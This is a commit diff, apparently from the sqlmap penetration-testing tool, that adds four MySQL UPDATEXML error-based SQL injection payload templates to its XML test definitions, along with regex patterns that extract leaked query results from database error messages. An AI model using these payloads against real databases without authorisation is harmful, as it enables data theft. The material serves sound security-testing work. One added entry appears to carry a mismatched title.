added MySQL updatexml error-based payload

This commit is contained in:
Miroslav Stampar 2011-07-24 21:08:32 +00:00
parent 2033a28ae7
commit ca83305b58

View File

@ -1010,7 +1010,7 @@ Formats:
</test>
<test>
<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause</title>
<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
<stype>2</stype>
<level>2</level>
<risk>0</risk>
@ -1029,6 +1029,26 @@ Formats:
</details>
</test>
<test>
<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
<clause>1</clause>
<where>1</where>
<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request>
<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.1</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
<stype>2</stype>
@ -1208,7 +1228,7 @@ Formats:
</test>
<test>
<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause</title>
<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
<stype>2</stype>
<level>3</level>
<risk>2</risk>
@ -1227,6 +1247,26 @@ Formats:
</details>
</test>
<test>
<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
<stype>2</stype>
<level>4</level>
<risk>2</risk>
<clause>1</clause>
<where>1</where>
<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request>
<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.1</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
<stype>2</stype>
@ -1433,7 +1473,7 @@ Formats:
</test>
<test>
<title>MySQL &gt;= 5.1 - Parameter replace</title>
<title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
@ -1452,6 +1492,26 @@ Formats:
</details>
</test>
<test>
<title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
<stype>2</stype>
<level>4</level>
<risk>0</risk>
<clause>1,2,3</clause>
<where>3</where>
<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
<request>
<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.1</dbms_version>
</details>
</test>
<test>
<title>PostgreSQL error-based - Parameter replace</title>
<stype>2</stype>
@ -1554,7 +1614,7 @@ Formats:
</test>
<test>
<title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses</title>
<title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
<stype>2</stype>
<level>3</level>
<risk>0</risk>
@ -1573,6 +1633,26 @@ Formats:
</details>
</test>
<test>
<title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
<stype>2</stype>
<level>4</level>
<risk>0</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request>
<payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.1</dbms_version>
</details>
</test>
<test>
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
<stype>2</stype>